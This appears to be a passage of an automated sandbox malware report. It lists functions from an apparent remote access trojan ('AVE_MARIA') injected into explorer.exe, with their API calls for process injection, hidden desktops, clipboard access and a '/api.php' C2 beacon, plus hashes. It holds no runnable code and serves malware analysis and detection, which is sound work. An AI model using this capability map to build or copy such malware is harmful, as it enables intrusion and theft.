Instruction Fuzzy Hash: 44817C32610A8695EB20DF25E8907ED77A5F7847A8F405136DA4E07E68EF78C38DD740

Function 08CBC55C Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 172fileinjectionprocessCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 08CBC5B0
GetFileSize.KERNEL32 ref: 08CBC5CB
malloc.LIBCMT ref: 08CBC5D5
ReadFile.KERNEL32 ref: 08CBC5F2
CloseHandle.KERNEL32 ref: 08CBC5FB
CreateProcessA.KERNEL32 ref: 08CBC65E
GetThreadContext.KERNEL32 ref: 08CBC6C3
VirtualAllocEx.KERNEL32 ref: 08CBC6EC
WriteProcessMemory.KERNEL32 ref: 08CBC70B
WriteProcessMemory.KERNEL32 ref: 08CBC745
NtQueryInformationProcess.NTDLL ref: 08CBC783

Strings

@, xrefs: 08CBC6E4

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: Process$File$CreateMemoryWrite$AllocCloseContextHandleInformationQueryReadSizeThreadVirtualmalloc
String ID: @
API String ID: 2661801814-2766056989
Opcode ID: 09236246219cb3b0eb613df847429b7da1a637ec83ead6095aa667148c1cac4b
Instruction ID: fec650ef3bedc51e330ae683e9cb05045091fd5432e97fdf7453d320cd0f416a
Opcode Fuzzy Hash: 09236246219cb3b0eb613df847429b7da1a637ec83ead6095aa667148c1cac4b
Instruction Fuzzy Hash: 12711976204F8186E724CF66F840B9EB7B4F788BA9F444115EE8A53B58DF78C146CB10

Function 0F3C6350 Relevance: 25.6, APIs: 17, Instructions: 102stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32 ref: 0F3C6399
lstrcatA.KERNEL32 ref: 0F3C63AD
CreateDirectoryA.KERNEL32 ref: 0F3C63B8
GetLastError.KERNEL32 ref: 0F3C63C2
FindFirstFileA.KERNEL32 ref: 0F3C63E1
lstrcpy.KERNEL32 ref: 0F3C6410
lstrcatA.KERNEL32 ref: 0F3C6421
lstrcatA.KERNEL32 ref: 0F3C6432
lstrcpy.KERNEL32 ref: 0F3C6457
lstrcatA.KERNEL32 ref: 0F3C6469
lstrcatA.KERNEL32 ref: 0F3C647B
lstrcmp.KERNEL32 ref: 0F3C6498
lstrcmp.KERNEL32 ref: 0F3C64B0
CreateDirectoryA.KERNEL32 ref: 0F3C64C1
GetLastError.KERNEL32 ref: 0F3C64CB
CopyFileA.KERNEL32 ref: 0F3C64F4
FindNextFileA.KERNEL32 ref: 0F3C6504

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$CreateDirectoryErrorFindLastlstrcmp$CopyFirstNext
String ID:
API String ID: 2173410017-0
Opcode ID: bccdc19c39cb459ebece20eb3efb1986d6c0c38ff43a778ad4d550a5af5f3701
Instruction ID: e68a163eb01a24710e24b613025091ee9b8ac49b3d417d1b65dd1788191b2b22
Opcode Fuzzy Hash: bccdc19c39cb459ebece20eb3efb1986d6c0c38ff43a778ad4d550a5af5f3701
Instruction Fuzzy Hash: 74517A61604A8695EB30DF25EC843ED3361F784BA8F848135C64E47AA9EF78C78ED340

Function 0F3D9AD8 Relevance: 18.1, APIs: 12, Instructions: 100stringprocessCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32 ref: 0F3D9B22
lstrcatA.KERNEL32 ref: 0F3D9B36
lstrcpy.KERNEL32 ref: 0F3D9B62
lstrcatA.KERNEL32 ref: 0F3D9B76
lstrcpy.KERNEL32 ref: 0F3D9BB7

Part of subcall function 0F3C652C: GetWindowsDirectoryA.KERNEL32 ref: 0F3C6570
Part of subcall function 0F3C652C: GetVolumeInformationA.KERNEL32 ref: 0F3C65BF
Part of subcall function 0F3C652C: wsprintfA.USER32 ref: 0F3C661C

lstrcatA.KERNEL32 ref: 0F3D9BD3

Part of subcall function 0F3C6350: lstrcpy.KERNEL32 ref: 0F3C6399
Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C63AD
Part of subcall function 0F3C6350: CreateDirectoryA.KERNEL32 ref: 0F3C63B8
Part of subcall function 0F3C6350: GetLastError.KERNEL32 ref: 0F3C63C2
Part of subcall function 0F3C6350: FindFirstFileA.KERNEL32 ref: 0F3C63E1
Part of subcall function 0F3C6350: lstrcpy.KERNEL32 ref: 0F3C6410
Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C6421
Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C6432
Part of subcall function 0F3C6350: lstrcpy.KERNEL32 ref: 0F3C6457
Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C6469
Part of subcall function 0F3C6350: lstrcatA.KERNEL32 ref: 0F3C647B
Part of subcall function 0F3C6350: lstrcmp.KERNEL32 ref: 0F3C6498
Part of subcall function 0F3C6350: lstrcmp.KERNEL32 ref: 0F3C64B0
Part of subcall function 0F3C6350: CreateDirectoryA.KERNEL32 ref: 0F3C64C1
Part of subcall function 0F3C6350: GetLastError.KERNEL32 ref: 0F3C64CB
Part of subcall function 0F3C6350: FindNextFileA.KERNEL32 ref: 0F3C6504

lstrcpy.KERNEL32 ref: 0F3D9C09
lstrcatA.KERNEL32 ref: 0F3D9C1A
lstrcatA.KERNEL32 ref: 0F3D9C2B
lstrcatA.KERNEL32 ref: 0F3D9C3C
lstrcatA.KERNEL32 ref: 0F3D9C4D
CreateProcessA.KERNEL32 ref: 0F3D9CBB

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$CreateDirectory$ErrorFileFindLastlstrcmp$FirstFolderInformationNextPathProcessVolumeWindowswsprintf
String ID:
API String ID: 3227933336-0
Opcode ID: 170e1715ff527eb968a9782cdb51c7666322d698c7ae97a6f9600ef82824d8be
Instruction ID: a779eca59b37407c6ec95e91c80086e20950ff493e18ab2aefc7ff8ed892c1d8
Opcode Fuzzy Hash: 170e1715ff527eb968a9782cdb51c7666322d698c7ae97a6f9600ef82824d8be
Instruction Fuzzy Hash: B2515772614A86AAEB30DF24E8943ED77A1F798318F805126D64D4AE68EF78C34DC740

Function 0F3D9884 Relevance: 18.1, APIs: 12, Instructions: 61threadsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0F3D9897

Part of subcall function 0F3C652C: GetWindowsDirectoryA.KERNEL32 ref: 0F3C6570
Part of subcall function 0F3C652C: GetVolumeInformationA.KERNEL32 ref: 0F3C65BF
Part of subcall function 0F3C652C: wsprintfA.USER32 ref: 0F3C661C

memset.MSVCRT ref: 0F3D98B6
OpenDesktopA.USER32 ref: 0F3D98F3
CreateDesktopA.USER32 ref: 0F3D9921
SetThreadDesktop.USER32 ref: 0F3D9931
CreateThread.KERNEL32 ref: 0F3D9950
WaitForSingleObject.KERNEL32 ref: 0F3D9963
??3@YAXPEAX@Z.MSVCRT ref: 0F3D9970
??3@YAXPEAX@Z.MSVCRT ref: 0F3D997D
??3@YAXPEAX@Z.MSVCRT ref: 0F3D998A
CloseHandle.KERNEL32 ref: 0F3D9997
CloseHandle.KERNEL32 ref: 0F3D99A4

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: ??3@Desktop$CloseCreateHandleThreadmemset$DirectoryInformationObjectOpenSingleVolumeWaitWindowswsprintf
String ID:
API String ID: 2892755948-0
Opcode ID: 113eead7a1daa152bab12c325c4ec425d8d11bb88e0457a47c1ebe6241598283
Instruction ID: 04a86587120ea4263c8c328a5e434520d06a452cb447f19835e4515d7c93a232
Opcode Fuzzy Hash: 113eead7a1daa152bab12c325c4ec425d8d11bb88e0457a47c1ebe6241598283
Instruction Fuzzy Hash: DB31D731610A4386F770EB21E89877633A1B788B25F414539DA0A46E74DF7C82A8E740

Function 0F3D006C Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32 ref: 0F3D0094
GlobalLock.KERNEL32 ref: 0F3D00AB
GlobalUnlock.KERNEL32 ref: 0F3D00C3
OpenClipboard.USER32 ref: 0F3D00CB
EmptyClipboard.USER32 ref: 0F3D00D1
SetClipboardData.USER32 ref: 0F3D00DF
CloseClipboard.USER32 ref: 0F3D00E5

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
String ID:
API String ID: 1677084743-0
Opcode ID: 44c5385e35553fb9f11cd72adc5e80b7f8b1bf3eff6ec1570e384e5543ccc5e2
Instruction ID: 585534d3f6d9beae1434123a5138e45764d94c2ecb733acd1cf7f5858de5c4b5
Opcode Fuzzy Hash: 44c5385e35553fb9f11cd72adc5e80b7f8b1bf3eff6ec1570e384e5543ccc5e2
Instruction Fuzzy Hash: 76012C35615B8286EA14AB62F81836E6361FB89FF0F4441399E4607B59CF7CC6458744

Function 0F3CFE98 Relevance: 7.5, APIs: 5, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0F3CFEAE
GetClipboardData.USER32 ref: 0F3CFEBB
GlobalLock.KERNEL32 ref: 0F3CFECC
GlobalUnlock.KERNEL32 ref: 0F3CFEDD
CloseClipboard.USER32 ref: 0F3CFEE3

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: a8745a6b37034a59282b45a54d1c22acf42de816d0719711342862b104b48221
Instruction ID: b8fcb9fc091d1230728e95a2aa4e633ae7f6df0e01360681cf9adb3a447b3866
Opcode Fuzzy Hash: a8745a6b37034a59282b45a54d1c22acf42de816d0719711342862b104b48221
Instruction Fuzzy Hash: 52016D2170578382EF289B32F844339A262AB84FF0F4891398E5A07B5ADF3CD546C340

Function 0F3FFFA0 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
Instruction ID: 306cd28af3e614e78e9ad03ba8d7051eba3df8e3091edfdaacfc48e33ee83525
Opcode Fuzzy Hash: 8b244b4f70fad90b39670434564d88c45866e8bd85f7bd71bacdac0a2d37a02e
Instruction Fuzzy Hash:

Function 0F3D8144 Relevance: 45.3, APIs: 30, Instructions: 342stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0F3D7E4C: EnterCriticalSection.KERNEL32 ref: 0F3D7E60
Part of subcall function 0F3D7E4C: LeaveCriticalSection.KERNEL32 ref: 0F3D7E89

wsprintfA.USER32 ref: 0F3D81D5
lstrlenA.KERNEL32 ref: 0F3D8222
??3@YAXPEAX@Z.MSVCRT ref: 0F3D83D3
_malloc_dbg.MSVCRT ref: 0F3D83DF
memcpy.MSVCRT ref: 0F3D83F2
lstrlenA.KERNEL32 ref: 0F3D8420
memcpy.MSVCRT ref: 0F3D843D
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8448
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8455
StrStrA.SHLWAPI ref: 0F3D8465
StrStrA.SHLWAPI ref: 0F3D849B
StrToIntA.SHLWAPI ref: 0F3D84D2
??3@YAXPEAX@Z.MSVCRT ref: 0F3D84E4
_malloc_dbg.MSVCRT ref: 0F3D850A
memcpy.MSVCRT ref: 0F3D8520
_malloc_dbg.MSVCRT ref: 0F3D8548
_realloc_dbg.MSVCRT ref: 0F3D8556
memcpy.MSVCRT ref: 0F3D8575
_malloc_dbg.MSVCRT ref: 0F3D8590
_realloc_dbg.MSVCRT ref: 0F3D859E
memcpy.MSVCRT ref: 0F3D85B3
_malloc_dbg.MSVCRT ref: 0F3D85F3
_realloc_dbg.MSVCRT ref: 0F3D8601
memcpy.MSVCRT ref: 0F3D8616

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy$_malloc_dbg$??3@$_realloc_dbg$CriticalSectionlstrlen$EnterLeavewsprintf
String ID:
API String ID: 588341381-0
Opcode ID: e76fd8026f968cb935bd01f4b84edd48c2ad81937e9f7efd6a22363fb80ea181
Instruction ID: ffdc4feed8b2f40aa794bacc100565ddb2bd7e32b8d82c9d9fcf887d80987725
Opcode Fuzzy Hash: e76fd8026f968cb935bd01f4b84edd48c2ad81937e9f7efd6a22363fb80ea181
Instruction Fuzzy Hash: B0D18A72605B428ADB64DF3AE85032D37A6FB85FA9F440529EE0A07B29DF38E545C740

Function 0F3D7F8C Relevance: 27.2, APIs: 18, Instructions: 163stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0F3D8752
_strncoll.MSVCRT ref: 0F3D8768
_strncoll.MSVCRT ref: 0F3D8786
_malloc_dbg.MSVCRT ref: 0F3D87B3
memcpy.MSVCRT ref: 0F3D87CC

Part of subcall function 0F3C6F48: StrStrIA.SHLWAPI ref: 0F3C6F5D

StrStrA.SHLWAPI ref: 0F3D8803
StrToIntA.SHLWAPI ref: 0F3D8829
??3@YAXPEAX@Z.MSVCRT ref: 0F3D883C
_realloc_dbg.MSVCRT ref: 0F3D8856
memcpy.MSVCRT ref: 0F3D8871
LeaveCriticalSection.KERNEL32 ref: 0F3D88A7
_malloc_dbg.MSVCRT ref: 0F3D88C7
memcpy.MSVCRT ref: 0F3D88DA
lstrlenA.KERNEL32 ref: 0F3D893D
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8968
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8971
??3@YAXPEAX@Z.MSVCRT ref: 0F3D898F
LeaveCriticalSection.KERNEL32 ref: 0F3D899C

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: ??3@$CriticalSectionmemcpy$Leave_malloc_dbg_strncoll$Enter_realloc_dbglstrlen
String ID:
API String ID: 3112935213-0
Opcode ID: fd230d44cd9cea604a4cfd9c66013708358b9af5c148d3f22046a68740b4e5e5
Instruction ID: 46f4de9f1f652560d20465903de5b0ef9070961e0cfc75a9dd999c1713c0e150
Opcode Fuzzy Hash: fd230d44cd9cea604a4cfd9c66013708358b9af5c148d3f22046a68740b4e5e5
Instruction Fuzzy Hash: E661A062601B4285EE20EF22F85433A67A5BB89FE1F490135DE4E4BB66DF3CE559D300

Function 0F3D8A70 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 117networkthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0F3D89BC: WSAStartup.WS2_32 ref: 0F3D89D8

SetThreadDesktop.USER32 ref: 0F3D8A8A
send.WS2_32 ref: 0F3D8AA9

Part of subcall function 0F3D9AB8: send.WS2_32 ref: 0F3D9ACC

recv.WS2_32 ref: 0F3D8AD4
RtlGetCompressionWorkSpaceSize.NTDLL ref: 0F3D8B11
_malloc_dbg.MSVCRT ref: 0F3D8B1A
RtlCompressBuffer.NTDLL ref: 0F3D8B57
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8B60
GetDesktopWindow.USER32 ref: 0F3D8B66
GetWindowRect.USER32 ref: 0F3D8B73
send.WS2_32 ref: 0F3D8BE3
recv.WS2_32 ref: 0F3D8BFB
recv.WS2_32 ref: 0F3D8C13
TerminateThread.KERNEL32 ref: 0F3D8C2A

Strings

AVE_MARIA, xrefs: 0F3D8A9B

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: recvsend$DesktopThreadWindow$??3@BufferCompressCompressionRectSizeSpaceStartupTerminateWork_malloc_dbg
String ID: AVE_MARIA
API String ID: 4073229312-2614216035
Opcode ID: d7d4635a60ad088d906c650275499f0fd8da18ca6b97f7371aeddd61e6b3adeb
Instruction ID: 81fa3c0a55dd3491a40565d1a15790184f6f24e9f8188f0509fca95b94a1b8ce
Opcode Fuzzy Hash: d7d4635a60ad088d906c650275499f0fd8da18ca6b97f7371aeddd61e6b3adeb
Instruction Fuzzy Hash: 0E414E3371170286EB24AB65FA44BB933A2B784BE9F005525ED0647F35DF38E588A700

Function 0F3C7224 Relevance: 21.1, APIs: 14, Instructions: 130stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0F3C728A
lstrlenA.KERNEL32 ref: 0F3C7293
lstrlenA.KERNEL32 ref: 0F3C729F
lstrlenA.KERNEL32 ref: 0F3C72B1

Part of subcall function 0F3C76BC: lstrlenA.KERNEL32 ref: 0F3C76E8

_malloc_dbg.MSVCRT ref: 0F3C72E1
memset.MSVCRT ref: 0F3C72FA
memcpy.MSVCRT ref: 0F3C7322
memcpy.MSVCRT ref: 0F3C7334
memcpy.MSVCRT ref: 0F3C7350
memcpy.MSVCRT ref: 0F3C7372
memcpy.MSVCRT ref: 0F3C7393
memcpy.MSVCRT ref: 0F3C73B0
memcpy.MSVCRT ref: 0F3C73DF
??3@YAXPEAX@Z.MSVCRT ref: 0F3C73E8

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: memcpy$lstrlen$??3@_malloc_dbgmemsetwsprintf
String ID:
API String ID: 492901009-0
Opcode ID: 430a08c57a099961239f6588bfe5b8a7a9a28289c504f7236ef4ff042c92407b
Instruction ID: 9ac79a0080f443a53da1a5c3758d85cb4c1d79546c339a56f541b1d7e42f9ec4
Opcode Fuzzy Hash: 430a08c57a099961239f6588bfe5b8a7a9a28289c504f7236ef4ff042c92407b
Instruction Fuzzy Hash: 20418176704A4286EB24DF2AE8447AEB761FB88FE4F445438CE4A03B65DE3CD54D8B40

Function 0C374298 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_crt.LIBCMT ref: 0C3742C1

Part of subcall function 0C36DDC4: malloc.LIBCMT ref: 0C36DDEF

free.LIBCMT ref: 0C3743C2
free.LIBCMT ref: 0C3743DE

Strings

onstructor closure', xrefs: 0C374398
or', xrefs: 0C374334
`copy constructor closure', xrefs: 0C374307, 0C374329, 0C37447A

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: free$_malloc_crtmalloc
String ID: `copy constructor closure'$onstructor closure'$or'
API String ID: 2027218043-1115476482
Opcode ID: c15c03bbeee6e195ae0e7f22bcb66eefc724195b1fc65d95fa29965c6df0ce92
Instruction ID: 159ec92d68fdfd8ae5417e8242163ab98c29098f3c7094571d78abadd13eb183
Opcode Fuzzy Hash: c15c03bbeee6e195ae0e7f22bcb66eefc724195b1fc65d95fa29965c6df0ce92
Instruction Fuzzy Hash: C6517B26311B4492EB20DB66E99075A73A4F788B98F5482259F9C47F14EF3CD16ACF04

Function 0F3C6130 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 95stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0F3C6170
RtlInitializeCriticalSection.NTDLL ref: 0F3C617D
lstrcpy.KERNEL32 ref: 0F3C61AA

Part of subcall function 0F3C652C: GetWindowsDirectoryA.KERNEL32 ref: 0F3C6570
Part of subcall function 0F3C652C: GetVolumeInformationA.KERNEL32 ref: 0F3C65BF
Part of subcall function 0F3C652C: wsprintfA.USER32 ref: 0F3C661C

lstrcpy.KERNEL32 ref: 0F3C61CD
lstrcatA.KERNEL32 ref: 0F3C61DD
LeaveCriticalSection.KERNEL32 ref: 0F3C624C
lstrcatA.KERNEL32 ref: 0F3C61ED

Part of subcall function 0F3C4520: lstrcpy.KERNEL32 ref: 0F3C4573
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4582
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4594
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45A6
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45B5
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45C7
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45E3
Part of subcall function 0F3C4520: wsprintfA.USER32 ref: 0F3C45F9
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4609
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C461B
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C462D
Part of subcall function 0F3C4520: WSAStartup.WS2_32 ref: 0F3C463F
Part of subcall function 0F3C4520: socket.WS2_32 ref: 0F3C465F
Part of subcall function 0F3C4520: gethostbyname.WS2_32 ref: 0F3C4679
Part of subcall function 0F3C4520: memcpy.MSVCRT ref: 0F3C4699
Part of subcall function 0F3C4520: htons.WS2_32 ref: 0F3C46A9
Part of subcall function 0F3C4520: connect.WS2_32 ref: 0F3C46C0
Part of subcall function 0F3C4520: lstrlenA.KERNEL32 ref: 0F3C46D3
Part of subcall function 0F3C4520: send.WS2_32 ref: 0F3C46E7

memcpy.MSVCRT ref: 0F3C6263
lstrlenA.KERNEL32 ref: 0F3C6270

Strings

{B955B2CC07A01546086603}, xrefs: 0F3C61B0, 0F3C61E3
/api.php?{B955B2CC07A01546086603}, xrefs: 0F3C61C3

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$CriticalSectionlstrcpy$lstrlenmemcpywsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonssendsocket
String ID: /api.php?{B955B2CC07A01546086603}${B955B2CC07A01546086603}
API String ID: 3614112389-2776999318
Opcode ID: 27fab9e54f04216fdd453d945221fa642927ccab0a3085506731d21741302df3
Instruction ID: fe645a8459e8be544e2a52e3b196b7db9727fc80a589b743951e9231f0ce5283
Opcode Fuzzy Hash: 27fab9e54f04216fdd453d945221fa642927ccab0a3085506731d21741302df3
Instruction Fuzzy Hash: 7651E436A00B46D5EB20DB61E8543A837B8F748BA4F40463ACD0D97B69DF38C65AD740

Function 08CB38EC Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 08CB38FD
free.LIBCMT ref: 08CB391A

Part of subcall function 08CB2F84: HeapFree.KERNEL32 ref: 08CB2F9A
Part of subcall function 08CB2F84: _errno.LIBCMT ref: 08CB2FA4
Part of subcall function 08CB2F84: GetLastError.KERNEL32 ref: 08CB2FAC

free.LIBCMT ref: 08CB392F
free.LIBCMT ref: 08CB3950
free.LIBCMT ref: 08CB3965
free.LIBCMT ref: 08CB3979
free.LIBCMT ref: 08CB3985
free.LIBCMT ref: 08CB39A3
EncodePointer.KERNEL32 ref: 08CB39AA
free.LIBCMT ref: 08CB39C3
free.LIBCMT ref: 08CB39DC
free.LIBCMT ref: 08CB3A08

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID:
API String ID: 4099253644-0
Opcode ID: f7051a25efdbd17a82a2807977a1313b5b3715d4396367db5dc6440f37134454
Instruction ID: 275dd22894b74cdd35c9729c2cb7a93d60b54b67acf84b043e10176e40ca1269
Opcode Fuzzy Hash: f7051a25efdbd17a82a2807977a1313b5b3715d4396367db5dc6440f37134454
Instruction Fuzzy Hash: B5311525A51E86C1FF19EB66E850BA463F0FB84B57F588619C9AD0F764DF3CC0419720

Function 0F3DF6B8 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 0F3DF6C9
free.LIBCMT ref: 0F3DF6E6

Part of subcall function 0F3DCEE4: HeapFree.KERNEL32 ref: 0F3DCEFA
Part of subcall function 0F3DCEE4: _errno.LIBCMT ref: 0F3DCF04

free.LIBCMT ref: 0F3DF6FB
free.LIBCMT ref: 0F3DF71C
free.LIBCMT ref: 0F3DF731
free.LIBCMT ref: 0F3DF745
free.LIBCMT ref: 0F3DF751
free.LIBCMT ref: 0F3DF76F
EncodePointer.KERNEL32 ref: 0F3DF776
free.LIBCMT ref: 0F3DF78F
free.LIBCMT ref: 0F3DF7A8
free.LIBCMT ref: 0F3DF7D4

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeFreeHeap_errno
String ID:
API String ID: 2825088286-0
Opcode ID: 80ed7709b81fb865fd2701c9381c00cfa0a9080e0d9e421e8263a039d25805be
Instruction ID: de7f69124f23d9b7cee837411c4340116158ed3bcb5006a70dd9e170d952e5d3
Opcode Fuzzy Hash: 80ed7709b81fb865fd2701c9381c00cfa0a9080e0d9e421e8263a039d25805be
Instruction Fuzzy Hash: 21313066621A4681EE24DB61F8A47793364BB447F1F481336DE1A8ABA2CF3CD048D305

Function 0F3DA84C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 119networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0F3DAAA0: WSAStartup.WS2_32 ref: 0F3DAAC7
Part of subcall function 0F3DAAA0: socket.WS2_32 ref: 0F3DAADC
Part of subcall function 0F3DAAA0: gethostbyname.WS2_32 ref: 0F3DAAEE
Part of subcall function 0F3DAAA0: memcpy.MSVCRT ref: 0F3DAB05
Part of subcall function 0F3DAAA0: htons.WS2_32 ref: 0F3DAB13
Part of subcall function 0F3DAAA0: connect.WS2_32 ref: 0F3DAB2A

recv.WS2_32 ref: 0F3DA88B
recv.WS2_32 ref: 0F3DA8A7
recv.WS2_32 ref: 0F3DA8C3
htons.WS2_32 ref: 0F3DA8D5
recv.WS2_32 ref: 0F3DA8ED
wsprintfA.USER32 ref: 0F3DA95E
recv.WS2_32 ref: 0F3DA977

Part of subcall function 0F3DAC04: send.WS2_32 ref: 0F3DAC24
Part of subcall function 0F3DAC04: send.WS2_32 ref: 0F3DAC41
Part of subcall function 0F3DAC04: send.WS2_32 ref: 0F3DAC61

Part of subcall function 0F3DAB54: ioctlsocket.WS2_32 ref: 0F3DAB76

closesocket.WS2_32 ref: 0F3DA9EE

Strings

%u.%u.%u.%u, xrefs: 0F3DA94E

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: recv$send$htons$Startupclosesocketconnectgethostbynameioctlsocketmemcpysocketwsprintf
String ID: %u.%u.%u.%u
API String ID: 1938678486-1542503432
Opcode ID: 148dea536ee756d11aa621f6b9b02c27fa6d64b4f0edc65fb89d0f5599d95eb2
Instruction ID: 96afa654d56a41bd958160f0fd467e059111824ee9457d796fd4f2195e87369c
Opcode Fuzzy Hash: 148dea536ee756d11aa621f6b9b02c27fa6d64b4f0edc65fb89d0f5599d95eb2
Instruction Fuzzy Hash: 1841F773314745C6EB209F36FA44BA93791E7817B8F445231EA5A87AA7EB3CC189C300

